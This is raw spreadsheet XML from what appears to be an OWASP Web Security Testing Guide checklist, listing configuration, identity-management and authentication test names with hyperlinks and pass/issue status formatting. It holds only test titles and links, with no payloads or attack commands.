        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/07-Test_HTTP_Strict_Transport_Security", "Test HTTP Strict Transport Security")</f>
        <v>Test HTTP Strict Transport Security</v>
      </c>
      <c r="D11" s="54" t="s">
        <v>98</v>
      </c>
      <c r="E11" s="18" t="s">
        <v>99</v>
      </c>
      <c r="F11" s="33" t="s">
        <v>94</v>
      </c>
      <c r="G11" s="33" t="s">
        <v>100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2.1">
      <c r="A12" s="7" t="s">
        <v>101</v>
      </c>
      <c r="B12" s="8" t="s">
        <v>102</v>
      </c>
      <c r="C12" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/08-Test_RIA_Cross_Domain_Policy", "Test RIA Cross Domain Policy")</f>
        <v>Test RIA Cross Domain Policy</v>
      </c>
      <c r="D12" s="17" t="s">
        <v>103</v>
      </c>
      <c r="E12" s="18" t="s">
        <v>99</v>
      </c>
      <c r="F12" s="33" t="s">
        <v>94</v>
      </c>
      <c r="G12" s="33" t="s">
        <v>104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48">
      <c r="A13" s="7" t="s">
        <v>105</v>
      </c>
      <c r="B13" s="8" t="s">
        <v>106</v>
      </c>
      <c r="C13" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/09-Test_File_Permission", "Test File Permission")</f>
        <v>Test File Permission</v>
      </c>
      <c r="D13" s="54" t="s">
        <v>107</v>
      </c>
      <c r="E13" s="18" t="s">
        <v>108</v>
      </c>
      <c r="F13" s="33" t="s">
        <v>109</v>
      </c>
      <c r="G13" s="33" t="s">
        <v>110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32.1">
      <c r="A14" s="7" t="s">
        <v>111</v>
      </c>
      <c r="B14" s="8" t="s">
        <v>112</v>
      </c>
      <c r="C14" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/10-Test_for_Subdomain_Takeover", "Test for Subdomain Takeover")</f>
        <v>Test for Subdomain Takeover</v>
      </c>
      <c r="D14" s="40" t="s">
        <v>113</v>
      </c>
      <c r="E14" s="18" t="s">
        <v>114</v>
      </c>
      <c r="F14" s="55" t="s">
        <v>15</v>
      </c>
      <c r="G14" s="33" t="s">
        <v>115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2.1">
      <c r="A15" s="7" t="s">
        <v>116</v>
      </c>
      <c r="B15" s="8" t="s">
        <v>117</v>
      </c>
      <c r="C15" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/11-Test_Cloud_Storage", "Test Cloud Storage")</f>
        <v>Test Cloud Storage</v>
      </c>
      <c r="D15" s="40" t="s">
        <v>118</v>
      </c>
      <c r="E15" s="18" t="s">
        <v>119</v>
      </c>
      <c r="F15" s="33" t="s">
        <v>27</v>
      </c>
      <c r="G15" s="33" t="s">
        <v>120</v>
      </c>
      <c r="H15" s="12"/>
      <c r="I15" s="13"/>
      <c r="J15" s="14" t="s"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2.1">
      <c r="A16" s="7" t="s">
        <v>121</v>
      </c>
      <c r="B16" s="8" t="s">
        <v>122</v>
      </c>
      <c r="C16" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/12-Test_for_Content_Security_Policy", "Testing for Content Security Policy")</f>
        <v>Testing for Content Security Policy</v>
      </c>
      <c r="D16" s="9" t="s">
        <v>123</v>
      </c>
      <c r="E16" s="18" t="s">
        <v>124</v>
      </c>
      <c r="F16" s="33" t="s">
        <v>94</v>
      </c>
      <c r="G16" s="33" t="s">
        <v>125</v>
      </c>
      <c r="H16" s="12"/>
      <c r="I16" s="13"/>
      <c r="J16" s="14" t="s"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7.100000000000001">
      <c r="A17" s="7" t="s">
        <v>126</v>
      </c>
      <c r="B17" s="8" t="s">
        <v>127</v>
      </c>
      <c r="C17" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/13-Test_for_Path_Confusion", "Test Path Confusion")</f>
        <v>Test Path Confusion</v>
      </c>
      <c r="D17" s="9" t="s">
        <v>128</v>
      </c>
      <c r="E17" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F17" s="33" t="s">
        <v>94</v>
      </c>
      <c r="G17" s="33" t="s">
        <v>129</v>
      </c>
      <c r="H17" s="12"/>
      <c r="I17" s="13"/>
      <c r="J17" s="14" t="s">
        <v>16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9"/>
      <c r="B18" s="20"/>
      <c r="C18" s="21"/>
      <c r="D18" s="21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>
      <c r="A19" s="23"/>
      <c r="B19" s="23"/>
      <c r="C19" s="24"/>
      <c r="D19" s="24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95">
      <c r="A20" s="25" t="s">
        <v>57</v>
      </c>
      <c r="B20" s="20"/>
      <c r="C20" s="21"/>
      <c r="D20" s="21"/>
      <c r="E20" s="22"/>
      <c r="F20" s="22"/>
      <c r="G20" s="22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8" ht="15.95">
      <c r="A21" s="12" t="s">
        <v>58</v>
      </c>
      <c r="B21" s="20"/>
      <c r="C21" s="21"/>
      <c r="D21" s="21"/>
      <c r="E21" s="22"/>
      <c r="F21" s="22"/>
      <c r="G21" s="22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8" ht="15.95">
      <c r="A22" s="12" t="s">
        <v>59</v>
      </c>
      <c r="B22" s="20"/>
      <c r="C22" s="21"/>
      <c r="D22" s="21"/>
      <c r="E22" s="22"/>
      <c r="F22" s="22"/>
      <c r="G22" s="22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8" ht="15.95">
      <c r="A23" s="12" t="s">
        <v>60</v>
      </c>
      <c r="B23" s="20"/>
      <c r="C23" s="21"/>
      <c r="D23" s="21"/>
      <c r="E23" s="22"/>
      <c r="F23" s="22"/>
      <c r="G23" s="22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8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>
      <c r="A943" s="19"/>
      <c r="B943" s="20"/>
      <c r="C943" s="21"/>
      <c r="D943" s="21"/>
      <c r="E943" s="19"/>
      <c r="F943" s="19"/>
      <c r="G943" s="19"/>
      <c r="H943" s="22"/>
      <c r="I943" s="22"/>
      <c r="J943" s="2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>
      <c r="A944" s="19"/>
      <c r="B944" s="20"/>
      <c r="C944" s="21"/>
      <c r="D944" s="21"/>
      <c r="E944" s="19"/>
      <c r="F944" s="19"/>
      <c r="G944" s="19"/>
      <c r="H944" s="22"/>
      <c r="I944" s="22"/>
      <c r="J944" s="2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</sheetData>
  <autoFilter ref="A3:J11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conditionalFormatting sqref="H5:H11">
    <cfRule type="cellIs" dxfId="302" priority="34" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H11">
    <cfRule type="cellIs" dxfId="301" priority="35" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H11">
    <cfRule type="cellIs" dxfId="300" priority="36" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H20:H23 I5:J11 I24:J944 I1:J2 I18:J19">
    <cfRule type="containsText" dxfId="299" priority="37" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H20:H23 I5:J11 I24:J944 I1:J2 I18:J19">
    <cfRule type="containsText" dxfId="298" priority="38" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H20:H23 I5:J11 I24:J944 I1:J2 I18:J19">
    <cfRule type="containsText" dxfId="297" priority="39" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="296" priority="31" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="295" priority="32" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="294" priority="33" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A22">
    <cfRule type="cellIs" dxfId="293" priority="28" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A22">
    <cfRule type="cellIs" dxfId="292" priority="29" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A22">
    <cfRule type="cellIs" dxfId="291" priority="30" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A23">
    <cfRule type="cellIs" dxfId="290" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A23">
    <cfRule type="cellIs" dxfId="289" priority="26" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A23">
    <cfRule type="cellIs" dxfId="288" priority="27" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12">
    <cfRule type="cellIs" dxfId="287" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12">
    <cfRule type="cellIs" dxfId="286" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12">
    <cfRule type="cellIs" dxfId="285" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:J12">
    <cfRule type="containsText" dxfId="284" priority="22" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I12))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:J12">
    <cfRule type="containsText" dxfId="283" priority="23" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I12))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:J12">
    <cfRule type="containsText" dxfId="282" priority="24" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I12))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H13">
    <cfRule type="cellIs" dxfId="281" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H13">
    <cfRule type="cellIs" dxfId="280" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H13">
    <cfRule type="cellIs" dxfId="279" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I13:J13">
    <cfRule type="containsText" dxfId="278" priority="16" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I13))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I13:J13">
    <cfRule type="containsText" dxfId="277" priority="17" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I13))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I13:J13">
    <cfRule type="containsText" dxfId="276" priority="18" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I13))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="cellIs" dxfId="275" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="cellIs" dxfId="274" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="cellIs" dxfId="273" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:J14">
    <cfRule type="containsText" dxfId="272" priority="10" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I14))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:J14">
    <cfRule type="containsText" dxfId="271" priority="11" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I14))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:J14">
    <cfRule type="containsText" dxfId="270" priority="12" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I14))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H15:H17">
    <cfRule type="cellIs" dxfId="269" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H15:H17">
    <cfRule type="cellIs" dxfId="268" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H15:H17">
    <cfRule type="cellIs" dxfId="267" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I15:J17">
    <cfRule type="containsText" dxfId="266" priority="4" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I15))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I15:J17">
    <cfRule type="containsText" dxfId="265" priority="5" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I15))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I15:J17">
    <cfRule type="containsText" dxfId="264" priority="6" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I15))))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H5:H17" xr:uid="{7F8B1CD1-8F1F-8F44-985A-3C8331F0AF41}">
      <formula1>$A$21:$A$23</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
  <pageSetup orientation="portrait"/>
  <ignoredErrors>
    <ignoredError sqref="A5:A1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B631-EC64-D64A-AF44-842589C79EF1}">
  <sheetPr>
    <tabColor rgb="FFA5A5A5"/>
  </sheetPr>
  <dimension ref="A1:AB93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67.8554687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17.42578125" style="2" bestFit="1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130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48">
      <c r="A5" s="7" t="s">
        <v>131</v>
      </c>
      <c r="B5" s="27" t="s">
        <v>132</v>
      </c>
      <c r="C5" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/01-Test_Role_Definitions", "Test Role Definitions")</f>
        <v>Test Role Definitions</v>
      </c>
      <c r="D5" s="9" t="s">
        <v>133</v>
      </c>
      <c r="E5" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>135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8">
      <c r="A6" s="7" t="s">
        <v>136</v>
      </c>
      <c r="B6" s="27" t="s">
        <v>137</v>
      </c>
      <c r="C6" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/02-Test_User_Registration_Process", "Test User Registration Process")</f>
        <v>Test User Registration Process</v>
      </c>
      <c r="D6" s="9" t="s">
        <v>138</v>
      </c>
      <c r="E6" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G6" s="12" t="s">
        <v>139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2.1">
      <c r="A7" s="7" t="s">
        <v>140</v>
      </c>
      <c r="B7" s="27" t="s">
        <v>141</v>
      </c>
      <c r="C7" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/03-Test_Account_Provisioning_Process", "Test Account Provisioning Process")</f>
        <v>Test Account Provisioning Process</v>
      </c>
      <c r="D7" s="9" t="s">
        <v>142</v>
      </c>
      <c r="E7" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F7" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G7" s="12" t="s">
        <v>143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2.1">
      <c r="A8" s="7" t="s">
        <v>144</v>
      </c>
      <c r="B8" s="27" t="s">
        <v>145</v>
      </c>
      <c r="C8" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account", "Testing for Account Enumeration and Guessable User Account")</f>
        <v>Testing for Account Enumeration and Guessable User Account</v>
      </c>
      <c r="D8" s="40" t="s">
        <v>146</v>
      </c>
      <c r="E8" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F8" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G8" s="12" t="s">
        <v>148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96">
      <c r="A9" s="7" t="s">
        <v>149</v>
      </c>
      <c r="B9" s="27" t="s">
        <v>150</v>
      </c>
      <c r="C9" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/05-Testing_for_Weak_or_Unenforced_Username_Policy", "Testing for Weak or Unenforced Username Policy")</f>
        <v>Testing for Weak or Unenforced Username Policy</v>
      </c>
      <c r="D9" s="54" t="s">
        <v>151</v>
      </c>
      <c r="E9" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F9" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G9" s="12" t="s">
        <v>148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9"/>
      <c r="B10" s="20"/>
      <c r="C10" s="21"/>
      <c r="D10" s="21"/>
      <c r="E10" s="19"/>
      <c r="F10" s="19"/>
      <c r="G10" s="19"/>
      <c r="H10" s="22"/>
      <c r="I10" s="22"/>
      <c r="J10" s="2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">
      <c r="A11" s="23"/>
      <c r="B11" s="23"/>
      <c r="C11" s="24"/>
      <c r="D11" s="24"/>
      <c r="E11" s="19"/>
      <c r="F11" s="19"/>
      <c r="G11" s="19"/>
      <c r="H11" s="22"/>
      <c r="I11" s="22"/>
      <c r="J11" s="2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95">
      <c r="A12" s="25" t="s">
        <v>57</v>
      </c>
      <c r="B12" s="20"/>
      <c r="C12" s="21"/>
      <c r="D12" s="21"/>
      <c r="E12" s="22"/>
      <c r="F12" s="22"/>
      <c r="G12" s="22"/>
      <c r="H12" s="22"/>
      <c r="I12" s="22"/>
      <c r="J12" s="2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8" ht="15.95">
      <c r="A13" s="12" t="s">
        <v>58</v>
      </c>
      <c r="B13" s="20"/>
      <c r="C13" s="21"/>
      <c r="D13" s="21"/>
      <c r="E13" s="22"/>
      <c r="F13" s="22"/>
      <c r="G13" s="22"/>
      <c r="H13" s="22"/>
      <c r="I13" s="22"/>
      <c r="J13" s="2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8" ht="15.95">
      <c r="A14" s="12" t="s">
        <v>59</v>
      </c>
      <c r="B14" s="20"/>
      <c r="C14" s="21"/>
      <c r="D14" s="21"/>
      <c r="E14" s="22"/>
      <c r="F14" s="22"/>
      <c r="G14" s="22"/>
      <c r="H14" s="22"/>
      <c r="I14" s="22"/>
      <c r="J14" s="2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8" ht="15.95">
      <c r="A15" s="12" t="s">
        <v>60</v>
      </c>
      <c r="B15" s="20"/>
      <c r="C15" s="21"/>
      <c r="D15" s="21"/>
      <c r="E15" s="22"/>
      <c r="F15" s="22"/>
      <c r="G15" s="22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8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9"/>
      <c r="B17" s="20"/>
      <c r="C17" s="21"/>
      <c r="D17" s="21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9"/>
      <c r="B18" s="20"/>
      <c r="C18" s="21"/>
      <c r="D18" s="21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>
      <c r="A19" s="19"/>
      <c r="B19" s="20"/>
      <c r="C19" s="21"/>
      <c r="D19" s="21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>
      <c r="A20" s="19"/>
      <c r="B20" s="20"/>
      <c r="C20" s="21"/>
      <c r="D20" s="21"/>
      <c r="E20" s="19"/>
      <c r="F20" s="19"/>
      <c r="G20" s="19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>
      <c r="A21" s="19"/>
      <c r="B21" s="20"/>
      <c r="C21" s="21"/>
      <c r="D21" s="21"/>
      <c r="E21" s="19"/>
      <c r="F21" s="19"/>
      <c r="G21" s="19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</sheetData>
  <autoFilter ref="A3:J9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5" type="noConversion"/>
  <conditionalFormatting sqref="H5:H9">
    <cfRule type="cellIs" dxfId="263" priority="16" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H9">
    <cfRule type="cellIs" dxfId="262" priority="17" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H9">
    <cfRule type="cellIs" dxfId="261" priority="18" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H15 I16:J936 I1:J2 I5:J11">
    <cfRule type="containsText" dxfId="260" priority="19" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H15 I16:J936 I1:J2 I5:J11">
    <cfRule type="containsText" dxfId="259" priority="20" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H15 I16:J936 I1:J2 I5:J11">
    <cfRule type="containsText" dxfId="258" priority="21" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A13">
    <cfRule type="cellIs" dxfId="257" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A13">
    <cfRule type="cellIs" dxfId="256" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A13">
    <cfRule type="cellIs" dxfId="255" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A14">
    <cfRule type="cellIs" dxfId="254" priority="10" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A14">
    <cfRule type="cellIs" dxfId="253" priority="11" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A14">
    <cfRule type="cellIs" dxfId="252" priority="12" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A15">
    <cfRule type="cellIs" dxfId="251" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A15">
    <cfRule type="cellIs" dxfId="250" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A15">
    <cfRule type="cellIs" dxfId="249" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H5:H9" xr:uid="{D1552B48-97EC-EC4D-882E-25736FEC3AF6}">
      <formula1>$A$13:$A$15</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
  <pageSetup orientation="portrait"/>
  <ignoredErrors>
    <ignoredError sqref="A5:A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0F15E-B5BD-EC43-B28D-6E846D64A196}">
  <sheetPr>
    <tabColor rgb="FFA5A5A5"/>
  </sheetPr>
  <dimension ref="A1:AB943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77.710937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17.42578125" style="2" bestFit="1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39" customHeight="1">
      <c r="A1" s="87" t="s">
        <v>152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7.100000000000001" customHeight="1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2.1">
      <c r="A5" s="7" t="s">
        <v>153</v>
      </c>
      <c r="B5" s="27" t="s">
        <v>154</v>
      </c>
      <c r="C5" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/01-Testing_for_Credentials_Transported_over_an_Encrypted_Channel", "Testing for Credentials Transported over an Encrypted Channel")</f>
        <v>Testing for Credentials Transported over an Encrypted Channel</v>
      </c>
      <c r="D5" s="49" t="s">
        <v>155</v>
      </c>
      <c r="E5" s="50" t="s">
        <v>15</v>
      </c>
      <c r="F5" s="50" t="s">
        <v>15</v>
      </c>
      <c r="G5" s="50" t="s">
        <v>15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8">
      <c r="A6" s="7" t="s">
        <v>156</v>
      </c>
      <c r="B6" s="27" t="s">
        <v>157</v>
      </c>
      <c r="C6" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials", "Testing for Default Credentials")</f>
        <v>Testing for Default Credentials</v>
      </c>
      <c r="D6" s="53" t="s">
        <v>158</v>
      </c>
      <c r="E6" s="11" t="s">
        <v>159</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G6" s="12" t="s">
        <v>160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48">
      <c r="A7" s="7" t="s">
        <v>161</v>
      </c>
      <c r="B7" s="27" t="s">
        <v>162</v>
      </c>
      <c r="C7" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism", "Testing for Weak Lock Out Mechanism")</f>
        <v>Testing for Weak Lock Out Mechanism</v>
      </c>
      <c r="D7" s="9" t="s">
        <v>163</v>
      </c>
      <c r="E7" s="11" t="s">
        <v>159</v>
      </c>
      <c r="F7" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G7" s="12" t="s">
        <v>164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44">
      <c r="A8" s="7" t="s">
        <v>165</v>
      </c>
      <c r="B8" s="27" t="s">
        <v>166</v>
      </c>
      <c r="C8" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema", "Testing for Bypassing Authentication Schema")</f>
        <v>Testing for Bypassing Authentication Schema</v>
      </c>
      <c r="D8" s="54" t="s">
        <v>167</v>
      </c>
      <c r="E8" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F8" s="12" t="s">
        <v>168</v>
      </c>
      <c r="G8" s="12" t="s">
        <v>169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8">
      <c r="A9" s="7" t="s">
        <v>170</v>
      </c>
      <c r="B9" s="27" t="s">
        <v>171</v>
      </c>
      <c r="C9" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/05-Testing_for_Vulnerable_Remember_Password", "Testing for Vulnerable Remember Password")</f>
        <v>Testing for Vulnerable Remember Password</v>
      </c>
      <c r="D9" s="54" t="s">
        <v>172</v>
      </c>
      <c r="E9" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F9" s="12" t="s">
        <v>173</v>
      </c>
      <c r="G9" s="12" t="s">
        <v>174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63.95">
      <c r="A10" s="7" t="s">
        <v>175</v>
      </c>
      <c r="B10" s="27" t="s">
        <v>176</v>
      </c>
      <c r="C10" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses", "Testing for Browser Cache Weaknesses")</f>
        <v>Testing for Browser Cache Weaknesses</v>
      </c>
      <c r="D10" s="53" t="s">
        <v>177</v>
      </c>
      <c r="E10" s="11" t="s">
        <v>178</v>
      </c>
      <c r="F10" s="12" t="s">
        <v>134</v>
      </c>
      <c r="G10" s="12" t="s">
        <v>179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3.95">
      <c r="A11" s="7" t="s">
        <v>180</v>
      </c>
      <c r="B11" s="27" t="s">
        <v>181</v>
      </c>
      <c r="C11" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy", "Testing for Weak Password Policy")</f>
        <v>Testing for Weak Password Policy</v>
      </c>
      <c r="D11" s="54" t="s">
        <v>182</v>
      </c>
      <c r="E11" s="18" t="s">
        <v>183</v>
      </c>
      <c r="F11" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G11" s="12" t="s">
        <v>184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48">
      <c r="A12" s="7" t="s">
        <v>185</v>
      </c>
      <c r="B12" s="27" t="s">
        <v>186</v>
      </c>
      <c r="C12" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Security_Question_Answer", "Testing for Weak Security Question Answer")</f>
        <v>Testing for Weak Security Question Answer</v>
      </c>
      <c r="D12" s="53" t="s">
        <v>187</v>
      </c>
      <c r="E12" s="11" t="s">
        <v>178</v>
      </c>
      <c r="F12" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G12" s="12" t="s">
        <v>188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80.099999999999994">
      <c r="A13" s="7" t="s">
        <v>189</v>
      </c>
      <c r="B13" s="27" t="s">
